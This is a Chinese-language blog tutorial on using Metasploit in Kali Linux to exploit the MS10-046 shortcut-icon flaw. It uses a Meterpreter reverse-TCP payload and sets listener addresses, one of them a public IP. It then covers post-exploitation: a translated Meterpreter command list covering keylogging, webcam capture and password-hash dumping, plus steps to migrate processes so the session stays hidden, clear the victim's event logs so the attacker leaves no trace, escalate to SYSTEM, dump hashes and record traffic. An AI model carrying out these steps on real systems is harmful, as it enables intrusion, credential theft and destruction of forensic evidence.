不多說,直接上干貨!
說在前面的話
注意啦:Meterpreter的命令非常之多,本篇博客下面給出了所有,大家可以去看看。給出了詳細的中文
由於篇幅原因,我只使用如下較常用的命令。
這篇博客,利用下面的這個xploit/windows/browser/ms10_046_shortcut_icon_dllloader漏洞來帶領大家。
前期博客
Kali linux 2016.2(Rolling)里Metasploit連接(包括默認和自定義)的PostgreSQL數據庫
Kali linux 2016.2(Rolling)里Metasploit連接(包括默認和自定義)的PostgreSQL數據庫之后的切換到指定的工作空間
這個大家,養成好習慣,進入到這里。
root@kali:~# msfconsole .~+P``````-o+:. -o+:. .+oooyysyyssyyssyddh++os-````` ``````````````` ` +++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o ++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy --.` .-.-...-////+++++++++++++++////////~~//////++++++++++++/// `...............` `...-/////...` .::::::::::-. .::::::- .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh` -Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh` -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/ `oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/ .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd .shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/ `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os: /MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+ -hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`:: .sMMmo. -dMd--:mN/` ||--X--|| ||--X--|| ........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//......... ================================================================================ =====================+--------------------------------+========================= =====================| Session one died of dysentery. |========================= =====================+--------------------------------+========================= ================================================================================ Press ENTER to size up the situation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Press SPACE BAR to continue Validate lots of vulnerabilities to demonstrate exposure with Metasploit Pro -- Learn more on http://rapid7.com/metasploit =[ metasploit v4.12.41-dev ] + -- --=[ 1597 exploits - 912 auxiliary - 274 post ] + -- --=[ 458 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
msf > db_status [*] postgresql connected to msf msf > db_disconnect msf > db_connect postgres:postgres@127.0.0.1/postgres [*] Rebuilding the module cache in the background... msf > db_status [*] postgresql connected to postgres msf > workspace * default 001 002 msf > workspace 001 [*] Workspace: 001 msf >
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) > show options Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4). URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_046_shortcut_icon_dllloader) >
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 202.193.58.13 SRVHOST => 202.193.58.13 msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 202.193.58.13 LHOST => 202.193.58.13 msf exploit(ms10_046_shortcut_icon_dllloader) > exploit [*] Exploit running as background job. [-] Handler failed to bind to 202.193.58.13:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\202.193.58.13\bPxC\. [*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (202.193.58.13:80).
所以,改換成,192.168.1.103了。
這里會話id是2。
以下是meterpreter 的總瀏覽:
meterpreter > help Core Commands 核心命令 ================ Command Description ------- ----------- ? Help menu 幫助菜單 background Backgrounds the current session 將當前會話拋到后台 bgkill Kills a background meterpreter script 殺死一個背景 meterpreter 腳本 bglist Lists running background scripts 提供所有正在運行的后台腳本的列表 bgrun Executes a meterpreter script as a background thread 作為一個后台線程運行腳本 channel Displays information or control active channels 顯示動態頻道的信息 close Closes a channel 關閉一個頻道 disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session 終止 meterpreter 會話 get_timeouts Get the current session timeout values help Help menu 幫助菜單 info Displays information about a Post module irb Drop into irb scripting mode 進入 Ruby 腳本模式 load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process 移動meterpreter到一個指定的 PID 的活動進程 quit Terminate the meterpreter session 終止 meterpreter 會話 read Reads data from a channel 從通道讀取數據 resource Run the commands stored in a file run Executes a meterpreter script or Post module 從頻道讀數據 sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for 'load' 加載一個或多個meterpreter 的擴展 uuid Get the UUID for the current session write Writes data to a channel 將數據寫入到一個頻道 Stdapi: File system Commands 文件系統命令 ===================================== Command Description ------- ----------- cat Read the contents of a file to the screen 讀取並輸出到標准輸出文件的內容 cd Change directory 對受害人更改目錄 checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory 從受害者系統文件下載 edit Edit a file 用 vim編輯文件 getlwd Print local working directory 打印本地目錄 getwd Print working directory 打印工作目錄 lcd Change local working directory 更改本地目錄 lpwd Print local working directory 打印本地目錄 ls List files 列出在當前目錄中的文件列表 mkdir Make directory 在受害者系統上的創建目錄 mv Move source to destination pwd Print working directory 輸出工作目錄 rm Delete the specified file 刪除文件 rmdir Remove directory 受害者系統上刪除目錄 search Search for files show_mount List all mount points/logical drives upload Upload a file or directory 從攻擊者的系統往受害者系統上傳文件 Stdapi: Networking Commands 網絡命令 ===================================== Command Description ------- ----------- arp Display the host ARP cache getproxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces 顯示網絡接口的關鍵信息,包括 IP 地址、 等。 netstat Display the network connections portfwd Forward a local port to a remote service 端口轉發 resolve Resolve a set of host names on the target route View and modify the routing table 查看或修改受害者路由表 Stdapi: System Commands 系統命令 ===================================== Command Description ------- ----------- clearev Clear the event log 清除了受害者的計算機上的事件日志 drop_token Relinquishes any active impersonation token. 被盜的令牌 execute Execute a command 執行命令 getenv Get one or more environment variable values getpid Get the current process identifier 獲取當前進程 ID (PID) getprivs Attempt to enable all privileges available to the current process 盡可能獲取盡可能多的特權 getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as 獲取作為運行服務器的用戶 kill Terminate a process 終止指定 PID 的進程 localtime Displays the target system's local date and time ps List running processes 列出正在運行的進程 reboot Reboots the remote computer 重新啟動受害人的計算機 reg Modify and interact with the remote registry 與受害人的注冊表進行交互,即可以修改受害人的注冊表 rev2self Calls RevertToSelf() on the remote machine 在受害者機器上調用 RevertToSelf() shell Drop into a system command shell 在受害者計算機上打開一個shell shutdown Shuts down the remote computer 關閉了受害者的計算機 steal_token Attempts to steal an impersonation token from the target process 試圖竊取指定的 (PID) 進程的令牌 suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS 獲取有關受害者計算機操作系統和名稱等的詳細信息 Stdapi: User interface Commands ===================================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations 列出所有可訪問桌面和windows工作站 getdesktop Get the current meterpreter desktop 獲取當前的 meterpreter 桌面 idletime Returns the number of seconds the remote user has been idle 檢查長時間以來,受害者系統空閑進程。或者說遠程用戶閑置時間 keyscan_dump Dump the keystroke buffer 鍵盤記錄軟件的內容轉儲 keyscan_start Start capturing keystrokes 啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件 keyscan_stop Stop capturing keystrokes 停止鍵盤記錄軟件 screenshot Grab a screenshot of the interactive desktop 抓去 meterpreter 桌面的屏幕截圖 setdesktop Change the meterpreters current desktop 更改 meterpreter 桌面 uictl Control some of the user interface components 啟用用戶界面組件的一些控件或者說用戶接口控制 Stdapi: Webcam Commands ===================================== Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Priv: Elevate Commands 特權升級命令 ===================================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system. 獲得系統管理員權限 Priv: Password database Commands 密碼數據庫的命令 ===================================== Command Description ------- ----------- hashdump Dumps the contents of the SAM database 抓去哈希密碼 (SAM) 文件中的值 或者說 SAM存儲,即說白了就是提取遠程系統的hash密碼
得到之后,然后可以結合 windows/smb/psesec,來通過smb登錄遠程系統 Priv: Timestomp Commands 時間戳命令 ===================================== Command Description ------- ----------- timestomp Manipulate file MACE attributes 操作修改,訪問,並創建一個文件的屬性 Incognito Commands ===================================== Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes Snarf challenge/response hashes for every token
這里,本篇博文,我重點帶大家講解幾個就好,其余的自行去玩。
1、 background 將當前會話轉移到后台
達到后台進程切換的目的。
2、migrate 遷移會話進程到指定pid
達到隱藏控制會話的進程,此時原來的進程是看不到的目的。
通過ps可以看到受害機的哪些進程。比如我這里弄1824
3、clearev 清除系統事件
打開事件查看器
windows中事件查詢器
為了,不讓暴露我們攻擊者的痕跡行為。
清楚攻擊機的事件發生器,此時再看對方(即被害主機)里面啥都沒了。
查看會話進程的pid
查看權限
shell命令,是進入cmdshell
按ctrl+z返回到后台
sysinfo,來查看系統信息
screenshot ,截屏並保存到一個文件
getsystem,提升至system系統最高權限
Meterpreter下的run腳本使用
連續按兩下tab,得到
run hashdump 來獲取系統賬號hash
注意:這個腳本的使用,是事先得要getsystem后,才能有效。
run post/windows/gather/enum_applications 獲取系統安裝程序
run vnc 用vnc控制對方桌面
run winenum 運行windows常用枚舉信息
枚舉信息會保存到一個文件中可以看
run packetrecorder -i 1 開啟抓包
參考:菜鳥騰飛安全網VIP《MetaSploit滲透測試平台之應用》